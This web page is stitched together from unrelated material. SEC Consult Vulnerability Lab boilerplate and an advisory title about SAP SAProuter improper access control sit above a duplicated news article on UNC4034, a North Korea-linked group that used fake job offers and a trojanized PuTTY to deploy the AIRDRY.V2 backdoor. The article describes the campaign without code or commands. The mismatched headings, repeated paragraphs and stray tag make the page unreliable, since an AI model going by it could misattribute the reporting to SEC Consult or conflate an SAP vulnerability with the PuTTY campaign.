~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF F. Hagg / @2022

SAP SAProuter Improper Access Control

A threat with a North Korea nexus has been found leveraging a "novel spear phish methodology" that involves making use of trojanized versions of the PuTTY SSH and Telnet client.
Google-owned threat intelligence firm Mandiant attributed the new campaign to an emerging threat cluster it tracks under the name UNC4034.
"UNC4034 established communication with the victim over WhatsApp and lured them

A threat with a North Korea nexus has been found leveraging a "novel spear phish methodology" that involves making use of trojanized versions of the PuTTY SSH and Telnet client.

Google-owned threat intelligence firm Mandiant attributed the new campaign to an emerging threat cluster it tracks under the name **UNC4034**.

"UNC4034 established communication with the victim over WhatsApp and lured them to download a malicious ISO package regarding a fake job offering that led to the deployment of the AIRDRY.V2 backdoor through a trojanized instance of the PuTTY utility," Mandiant researchers said.

The use of fabricated job lures as a pathway for malware distribution is an oft-used tactic by North Korean state-sponsored actors, including the Lazarus Group, as part of an enduring campaign called Operation Dream Job.

The entry point of the attack is an ISO file that masquerades as an Amazon Assessment as part of a potential job opportunity at the tech giant. The file was shared over WhatApp after establishing initial contact over email.

The archive, for its part, holds a text file containing an IP address and login credentials, and an altered version of PuTTY that, in turn, loads a dropper called DAVESHELL, which deploys a newer variant of a backdoor dubbed AIRDRY.

It's likely that the threat actor convinced the victim to launch a PuTTY session and use the credentials provided in the TXT file to connect to the remote host, effectively activating the infection.

AIRDRY, also known as BLINDINGCAN, has in the past been used by North Korea-linked hackers to strike U.S. defense contractors and entities in South Korea and Latvia.

While earlier versions of the malware came with nearly 30 commands for file transfer, file management, and command execution, the latest version has been found to eschew the command-based approach in favor of plugins that are downloaded and executed in memory.

Mandiant said it was able to contain the compromise before any further post-exploitation activities could take place following the deployment of the implant.

The development is yet another sign that the use of ISO files for initial access is gaining traction among threat actors to deliver both commodity and targeted malware.

The shift is also attributable to Microsoft's decision to block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros for Office apps downloaded from the internet by default.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac